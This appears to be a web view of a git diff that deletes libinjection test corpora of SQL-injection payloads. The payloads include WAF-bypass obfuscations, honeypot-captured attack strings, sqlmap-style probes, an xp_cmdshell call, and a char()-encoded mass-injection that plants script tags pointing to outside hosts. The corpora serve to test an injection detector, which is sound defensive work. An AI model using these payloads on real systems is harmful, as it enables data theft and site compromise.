group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
|
||||
|
||||
|
||||
#
|
||||
# Slide 74 (MySQL Obfuscation)
|
||||
#
|
||||
1.UNION SELECT 2
|
||||
3.2UNION SELECT 2
|
||||
1e0UNION SELECT 2
|
||||
SELECT\N/0.e3UNION SELECT 2
|
||||
1e1AND-0.0UNION SELECT 2
|
||||
1/*!12345UNION/*!31337SELECT/*!table_name*/
|
||||
{ts 1}UNION SELECT.`` 1.e.table_name
|
||||
SELECT $.`` 1.e.table_name
|
||||
SELECT{_ .``1.e.table_name}
|
||||
SELECT LightOS . ``1.e.table_name LightOS)
|
||||
SELECT information_schema 1337.e.tables 13.37e.table_name
|
||||
SELECT 1 from information_schema 9.e.table_name
|
||||
|
||||
#
|
||||
# Slide 75 (MSSQL Obfuscation)
|
||||
#
|
||||
.1UNION SELECT 2
|
||||
1.UNION SELECT.2alias
|
||||
1e0UNION SELECT 2
|
||||
1e1AND-1=0.0UNION SELECT 2
|
||||
SELECT 0xUNION SELECT 2
|
||||
SELECT\UNION SELECT 2
|
||||
\1UNION SELECT 2
|
||||
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
|
||||
SELECT"table_name"FROM[information_schema].[tables]
|
||||
|
||||
#
|
||||
# Slide 76 (Oracle Obfuscation)
|
||||
#
|
||||
1FUNION SELECT 2
|
||||
1DUNION SELECT 2
|
||||
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
|
||||
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
|
||||
SELECT%00table_name%00FROM%00all_tab_tables
|
||||
|
||||
#
|
||||
# Slide 77 (Bypassing Firewalls, General Tips)
|
||||
#
|
||||
1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
|
||||
CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
|
||||
|
||||
#
|
||||
# Slide 78 (Modsecurity)
|
||||
#
|
||||
-2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1
|
||||
|
||||
#
|
||||
# Slide 79 (Modsecurity)
|
||||
#
|
||||
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES
|
||||
|
||||
#
|
||||
# Slide 80 (Fortinet)
|
||||
# (Skipped since specific to Fortinet)
|
||||
#S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2
|
||||
|
||||
#
|
||||
# Slide 81 (GreenSQL)
|
||||
#
|
||||
-1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =‘C’,1,2)
|
||||
|
||||
#
|
||||
# Slide 83 (libinjection)
|
||||
#
|
||||
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
|
||||
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
|
||||
|
||||
# note changed "FROM table" to "FROM table_name"
|
||||
# and "column" to "column_name"
|
||||
-1fUNION SELECT column_name FROM table_name
|
||||
|
||||
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
|
||||
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
|
||||
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1
|
||||
|
||||
#
|
||||
# Slide 84 (libinjection)
|
||||
#
|
||||
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
|
||||
1 mod /*!1*/ union select table_name from information_schema.tables--
|
||||
true is not unknown for update union select table_name from information_schema.tables
|
||||
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
|
||||
$.``.id and 0 union select table_name from information_schema.tables
|
||||
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
|
||||
/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
|
||||
-1.for update union select table_name from information_schema.tables limit 1
|
||||
-0b01 union select table_name from information_schema.tables limit 1
|
||||
1<binary 1>2 union select table_name from information_schema.tables limit 1
|
||||
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
|
||||
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -1,24 +0,0 @@
|
|||
#
|
||||
# http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html
|
||||
#
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users--
|
||||
35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
|
@ -1,12 +0,0 @@
|
|||
#
|
||||
# http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
|
||||
#
|
||||
21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
File diff suppressed because it is too large
Load Diff
|
@ -1,100 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/109
|
||||
#
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL)
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi)
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets)
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff
|
||||
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg
|
||||
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv
|
||||
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf
|
||||
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz
|
||||
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy
|
||||
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb
|
||||
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS
|
||||
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI
|
||||
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv
|
||||
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA
|
||||
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM
|
||||
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA
|
||||
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG
|
||||
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF
|
||||
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW
|
||||
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki
|
||||
"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ
|
||||
1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB
|
||||
1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"="
|
||||
1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"="
|
||||
1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"="
|
||||
1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"="
|
||||
1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"="
|
||||
1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"="
|
||||
1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"="
|
||||
1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"="
|
||||
1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"="
|
||||
1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"="
|
||||
1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"="
|
||||
